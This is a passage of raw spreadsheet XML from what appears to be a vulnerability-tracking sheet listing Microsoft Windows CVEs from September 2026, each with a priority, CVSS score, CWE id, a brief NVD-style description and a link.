t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G699" s="5" t="inlineStr" /><c r="H699" s="5" t="n"><v>0.004</v></c><c r="I699" s="5" t="inlineStr" /><c r="J699" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K6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699" s="5" t="inlineStr" /><c r="M699" s="5" t="inlineStr" /><c r="N699" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O699" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P699" s="5" t="inlineStr" /><c r="Q699" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="R699" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S699" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68838</t></is></c></row><row r="700"><c r="A700" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B700" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C700" s="5" t="inlineStr"><is><t>CVE-2026-68876</t></is></c><c r="D700" s="5" t="n"><v>8</v></c><c r="E700" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F700" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G700" s="5" t="inlineStr" /><c r="H700" s="5" t="n"><v>0.007</v></c><c r="I700" s="5" t="inlineStr" /><c r="J700" s="5" t="inlineStr" /><c r="K700" s="5" t="inlineStr" /><c r="L700" s="5" t="inlineStr" /><c r="M700" s="5" t="inlineStr" /><c r="N700" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O700" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P700" s="5" t="inlineStr" /><c r="Q700" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R700" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Program Compatibility Assistant Service allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S700" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68876</t></is></c></row><row r="701"><c r="A701" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B701" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C701" s="5" t="inlineStr"><is><t>CVE-2026-68878</t></is></c><c r="D701" s="5" t="n"><v>8</v></c><c r="E701" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F701" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G701" s="5" t="inlineStr" /><c r="H701" s="5" t="n"><v>0.005</v></c><c r="I701" s="5" t="inlineStr" /><c r="J701" s="5" t="inlineStr" /><c r="K701" s="5" t="inlineStr" /><c r="L701" s="5" t="inlineStr" /><c r="M701" s="5" t="inlineStr" /><c r="N701" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O701" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P701" s="5" t="inlineStr" /><c r="Q701" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="R701" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows Fast FAT Driver allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S701" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68878</t></is></c></row><row r="702"><c r="A702" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B702" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C702" s="5" t="inlineStr"><is><t>CVE-2026-68880</t></is></c><c r="D702" s="5" t="n"><v>8</v></c><c r="E702" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F702" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G702" s="5" t="inlineStr" /><c r="H702" s="5" t="n"><v>0.004</v></c><c r="I702" s="5" t="inlineStr" /><c r="J702" s="5" t="inlineStr" /><c r="K702" s="5" t="inlineStr" /><c r="L702" s="5" t="inlineStr" /><c r="M702" s="5" t="inlineStr" /><c r="N702" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O702" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P702" s="5" t="inlineStr" /><c r="Q702" s="5" t="inlineStr"><is><t>CWE-122, CWE-197</t></is></c><c r="R702" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S702" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68880</t></is></c></row><row r="703"><c r="A703" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B703" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C703" s="5" t="inlineStr"><is><t>CVE-2026-68894</t></is></c><c r="D703" s="5" t="n"><v>8</v></c><c r="E703" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F703" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G703" s="5" t="inlineStr" /><c r="H703" s="5" t="n"><v>0.006</v></c><c r="I703" s="5" t="inlineStr" /><c r="J703" s="5" t="inlineStr" /><c r="K703" s="5" t="inlineStr" /><c r="L703" s="5" t="inlineStr" /><c r="M703" s="5" t="inlineStr" /><c r="N703" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O703" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P703" s="5" t="inlineStr" /><c r="Q703" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R703" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S703" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-68894</t></is></c></row><row r="704"><c r="A704" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B704" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C704" s="5" t="inlineStr"><is><t>CVE-2026-69271</t></is></c><c r="D704" s="5" t="n"><v>8</v></c><c r="E704" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F704" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G704" s="5" t="inlineStr" /><c r="H704" s="5" t="n"><v>0.007</v></c><c r="I704" s="5" t="inlineStr" /><c r="J704" s="5" t="inlineStr" /><c r="K704" s="5" t="inlineStr" /><c r="L704" s="5" t="inlineStr" /><c r="M704" s="5" t="inlineStr" /><c r="N704" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O704" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P704" s="5" t="inlineStr" /><c r="Q704" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R704" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Standard XPS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S704" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69271</t></is></c></row><row r="705"><c r="A705" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B705" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C705" s="5" t="inlineStr"><is><t>CVE-2026-69301</t></is></c><c r="D705" s="5" t="n"><v>8</v></c><c r="E705" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F705" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G705" s="5" t="inlineStr" /><c r="H705" s="5" t="n"><v>0.008</v></c><c r="I705" s="5" t="inlineStr" /><c r="J705" s="5" t="inlineStr" /><c r="K705" s="5" t="inlineStr" /><c r="L705" s="5" t="inlineStr" /><c r="M705" s="5" t="inlineStr" /><c r="N705" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O705" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P705" s="5" t="inlineStr" /><c r="Q705" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="R705" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows Win32K allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S705" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69301</t></is></c></row><row r="706"><c r="A706" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B706" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C706" s="5" t="inlineStr"><is><t>CVE-2026-69322</t></is></c><c r="D706" s="5" t="n"><v>8</v></c><c r="E706" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F706" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G706" s="5" t="inlineStr" /><c r="H706" s="5" t="n"><v>0.007</v></c><c r="I706" s="5" t="inlineStr" /><c r="J706" s="5" t="inlineStr" /><c r="K706" s="5" t="inlineStr" /><c r="L706" s="5" t="inlineStr" /><c r="M706" s="5" t="inlineStr" /><c r="N706" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O706" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P706" s="5" t="inlineStr" /><c r="Q706" s="5" t="inlineStr"><is><t>CWE-415</t></is></c><c r="R706" s="5" t="inlineStr"><is><t>Double free in Microsoft Windows Search Component allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S706" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69322</t></is></c></row><row r="707"><c r="A707" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B707" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C707" s="5" t="inlineStr"><is><t>CVE-2026-69332</t></is></c><c r="D707" s="5" t="n"><v>8</v></c><c r="E707" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F707" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G707" s="5" t="inlineStr" /><c r="H707" s="5" t="n"><v>0.007</v></c><c r="I707" s="5" t="inlineStr" /><c r="J707" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K70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07" s="5" t="inlineStr" /><c r="M707" s="5" t="inlineStr" /><c r="N707" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O707" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P707" s="5" t="inlineStr" /><c r="Q707" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R707" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S707" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69332</t></is></c></row><row r="708"><c r="A708" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B708" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C708" s="5" t="inlineStr"><is><t>CVE-2026-69346</t></is></c><c r="D708" s="5" t="n"><v>8</v></c><c r="E708" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F708" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G708" s="5" t="inlineStr" /><c r="H708" s="5" t="n"><v>0.007</v></c><c r="I708" s="5" t="inlineStr" /><c r="J708" s="5" t="inlineStr" /><c r="K708" s="5" t="inlineStr" /><c r="L708" s="5" t="inlineStr" /><c r="M708" s="5" t="inlineStr" /><c r="N708" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O708" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P708" s="5" t="inlineStr" /><c r="Q708" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R708" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Print Spooler Components allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S708" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69346</t></is></c></row><row r="709"><c r="A709" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B709" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C709" s="5" t="inlineStr"><is><t>CVE-2026-69365</t></is></c><c r="D709" s="5" t="n"><v>8</v></c><c r="E709" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F709" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G709" s="5" t="inlineStr" /><c r="H709" s="5" t="n"><v>0.007</v></c><c r="I709" s="5" t="inlineStr" /><c r="J709" s="5" t="inlineStr" /><c r="K709" s="5" t="inlineStr" /><c r="L709" s="5" t="inlineStr" /><c r="M709" s="5" t="inlineStr" /><c r="N709" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O709" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P709" s="5" t="inlineStr" /><c r="Q709" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R709" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Local Security Authority Server (lsasrv) allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S709" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69365</t></is></c></row><row r="710"><c r="A710" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B710" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C710" s="5" t="inlineStr"><is><t>CVE-2026-69371</t></is></c><c r="D710" s="5" t="n"><v>8</v></c><c r="E710" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F710" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G710" s="5" t="inlineStr" /><c r="H710" s="5" t="n"><v>0.007</v></c><c r="I710" s="5" t="inlineStr" /><c r="J710" s="5" t="inlineStr" /><c r="K710" s="5" t="inlineStr" /><c r="L710" s="5" t="inlineStr" /><c r="M710" s="5" t="inlineStr" /><c r="N710" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O710" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P710" s="5" t="inlineStr" /><c r="Q710" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R710" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Overlay Filter allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S710" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69371</t></is></c></row><row r="711"><c r="A711" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B711" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C711" s="5" t="inlineStr"><is><t>CVE-2026-69412</t></is></c><c r="D711" s="5" t="n"><v>8</v></c><c r="E711" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F711" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G711" s="5" t="inlineStr" /><c r="H711" s="5" t="n"><v>0.005</v></c><c r="I711" s="5" t="inlineStr" /><c r="J711" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K711" s="5" t="inlineStr"><is><t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t></is></c><c r="L711" s="5" t="inlineStr" /><c r="M711" s="5" t="inlineStr" /><c r="N711" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O711" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P711" s="5" t="inlineStr" /><c r="Q711" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="R711" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows DHCP Server allows an authorized attacker to execute code over an adjacent network.</t></is></c><c r="S711" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69412</t></is></c></row><row r="712"><c r="A712" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B712" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C712" s="5" t="inlineStr"><is><t>CVE-2026-69418</t></is></c><c r="D712" s="5" t="n"><v>8</v></c><c r="E712" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F712" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G712" s="5" t="inlineStr" /><c r="H712" s="5" t="n"><v>0.007</v></c><c r="I712" s="5" t="inlineStr" /><c r="J712" s="5" t="inlineStr" /><c r="K712" s="5" t="inlineStr" /><c r="L712" s="5" t="inlineStr" /><c r="M712" s="5" t="inlineStr" /><c r="N712" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O712" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P712" s="5" t="inlineStr" /><c r="Q712" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R712" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Volume Manager Driver allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S712" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69418</t></is></c></row><row r="713"><c r="A713" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B713" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C713" s="5" t="inlineStr"><is><t>CVE-2026-69423</t></is></c><c r="D713" s="5" t="n"><v>8</v></c><c r="E713" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F713" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G713" s="5" t="inlineStr" /><c r="H713" s="5" t="n"><v>0.007</v></c><c r="I713" s="5" t="inlineStr" /><c r="J713" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K71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13" s="5" t="inlineStr" /><c r="M713" s="5" t="inlineStr" /><c r="N713" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O713" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P713" s="5" t="inlineStr" /><c r="Q713" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R713" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows USB Video Driver allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S713" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69423</t></is></c></row><row r="714"><c r="A714" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B714" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C714" s="5" t="inlineStr"><is><t>CVE-2026-69427</t></is></c><c r="D714" s="5" t="n"><v>8</v></c><c r="E714" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F714" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G714" s="5" t="inlineStr" /><c r="H714" s="5" t="n"><v>0.007</v></c><c r="I714" s="5" t="inlineStr" /><c r="J714" s="5" t="inlineStr" /><c r="K714" s="5" t="inlineStr" /><c r="L714" s="5" t="inlineStr" /><c r="M714" s="5" t="inlineStr" /><c r="N714" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O714" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P714" s="5" t="inlineStr" /><c r="Q714" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R714" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows VOLSNAP.SYS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S714" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69427</t></is></c></row><row r="715"><c r="A715" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B715" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C715" s="5" t="inlineStr"><is><t>CVE-2026-69458</t></is></c><c r="D715" s="5" t="n"><v>8</v></c><c r="E715" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F715" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G715" s="5" t="inlineStr" /><c r="H715" s="5" t="n"><v>0.007</v></c><c r="I715" s="5" t="inlineStr" /><c r="J715" s="5" t="inlineStr" /><c r="K715" s="5" t="inlineStr" /><c r="L715" s="5" t="inlineStr" /><c r="M715" s="5" t="inlineStr" /><c r="N715" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O715" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P715" s="5" t="inlineStr" /><c r="Q715" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R715" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows BitLocker allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S715" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69458</t></is></c></row><row r="716"><c r="A716" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B716" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C716" s="5" t="inlineStr"><is><t>CVE-2026-69462</t></is></c><c r="D716" s="5" t="n"><v>8</v></c><c r="E716" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F716" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G716" s="5" t="inlineStr" /><c r="H716" s="5" t="n"><v>0.007</v></c><c r="I716" s="5" t="inlineStr" /><c r="J716" s="5" t="inlineStr" /><c r="K716" s="5" t="inlineStr" /><c r="L716" s="5" t="inlineStr" /><c r="M716" s="5" t="inlineStr" /><c r="N716" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O716" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P716" s="5" t="inlineStr" /><c r="Q716" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R716" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Error Reporting allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S716" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69462</t></is></c></row><row r="717"><c r="A717" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B717" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C717" s="5" t="inlineStr"><is><t>CVE-2026-69481</t></is></c><c r="D717" s="5" t="n"><v>8</v></c><c r="E717" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F717" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G717" s="5" t="inlineStr" /><c r="H717" s="5" t="n"><v>0.007</v></c><c r="I717" s="5" t="inlineStr" /><c r="J717" s="5" t="inlineStr" /><c r="K717" s="5" t="inlineStr" /><c r="L717" s="5" t="inlineStr" /><c r="M717" s="5" t="inlineStr" /><c r="N717" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O717" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P717" s="5" t="inlineStr" /><c r="Q717" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R717" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Enterprise App Management allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S717" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69481</t></is></c></row><row r="718"><c r="A718" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B718" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C718" s="5" t="inlineStr"><is><t>CVE-2026-69503</t></is></c><c r="D718" s="5" t="n"><v>8</v></c><c r="E718" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F718" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G718" s="5" t="inlineStr" /><c r="H718" s="5" t="n"><v>0.008</v></c><c r="I718" s="5" t="inlineStr" /><c r="J718" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K71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18" s="5" t="inlineStr" /><c r="M718" s="5" t="inlineStr" /><c r="N718" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O718" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P718" s="5" t="inlineStr" /><c r="Q718" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="R718" s="5" t="inlineStr"><is><t>Stack-based buffer overflow in Windows USB Driver allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S718" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69503</t></is></c></row><row r="719"><c r="A719" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B719" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C719" s="5" t="inlineStr"><is><t>CVE-2026-69505</t></is></c><c r="D719" s="5" t="n"><v>8</v></c><c r="E719" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F719" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G719" s="5" t="inlineStr" /><c r="H719" s="5" t="n"><v>0.008</v></c><c r="I719" s="5" t="inlineStr" /><c r="J719" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K71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19" s="5" t="inlineStr" /><c r="M719" s="5" t="inlineStr" /><c r="N719" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O719" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P719" s="5" t="inlineStr" /><c r="Q719" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R719" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S719" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69505</t></is></c></row><row r="720"><c r="A720" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B720" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C720" s="5" t="inlineStr"><is><t>CVE-2026-69512</t></is></c><c r="D720" s="5" t="n"><v>8</v></c><c r="E720" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F720" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G720" s="5" t="inlineStr" /><c r="H720" s="5" t="n"><v>0.008</v></c><c r="I720" s="5" t="inlineStr" /><c r="J720" s="5" t="inlineStr" /><c r="K720" s="5" t="inlineStr" /><c r="L720" s="5" t="inlineStr" /><c r="M720" s="5" t="inlineStr" /><c r="N720" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O720" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P720" s="5" t="inlineStr" /><c r="Q720" s="5" t="inlineStr"><is><t>CWE-122, CWE-197</t></is></c><c r="R720" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Spaceport.sys allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S720" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69512</t></is></c></row><row r="721"><c r="A721" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B721" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C721" s="5" t="inlineStr"><is><t>CVE-2026-69619</t></is></c><c r="D721" s="5" t="n"><v>8</v></c><c r="E721" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F721" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G721" s="5" t="inlineStr" /><c r="H721" s="5" t="n"><v>0.008</v></c><c r="I721" s="5" t="inlineStr" /><c r="J721" s="5" t="inlineStr" /><c r="K721" s="5" t="inlineStr" /><c r="L721" s="5" t="inlineStr" /><c r="M721" s="5" t="inlineStr" /><c r="N721" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O721" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P721" s="5" t="inlineStr" /><c r="Q721" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R721" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows exFAT File System allows an authorized attacker to elevate privileges over a network.</t></is></c><c r="S721" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69619</t></is></c></row><row r="722"><c r="A722" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B722" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C722" s="5" t="inlineStr"><is><t>CVE-2026-69623</t></is></c><c r="D722" s="5" t="n"><v>8</v></c><c r="E722" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F722" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G722" s="5" t="inlineStr" /><c r="H722" s="5" t="n"><v>0.008999999999999999</v></c><c r="I722" s="5" t="inlineStr" /><c r="J722" s="5" t="inlineStr" /><c r="K722" s="5" t="inlineStr" /><c r="L722" s="5" t="inlineStr" /><c r="M722" s="5" t="inlineStr" /><c r="N722" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O722" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P722" s="5" t="inlineStr" /><c r="Q722" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R722" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="S722" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69623</t></is></c></row><row r="723"><c r="A723" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B723" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C723" s="5" t="inlineStr"><is><t>CVE-2026-69625</t></is></c><c r="D723" s="5" t="n"><v>8</v></c><c r="E723" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F723" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G723" s="5" t="inlineStr" /><c r="H723" s="5" t="n"><v>0.007</v></c><c r="I723" s="5" t="inlineStr" /><c r="J723" s="5" t="inlineStr" /><c r="K723" s="5" t="inlineStr" /><c r="L723" s="5" t="inlineStr" /><c r="M723" s="5" t="inlineStr" /><c r="N723" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O723" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c 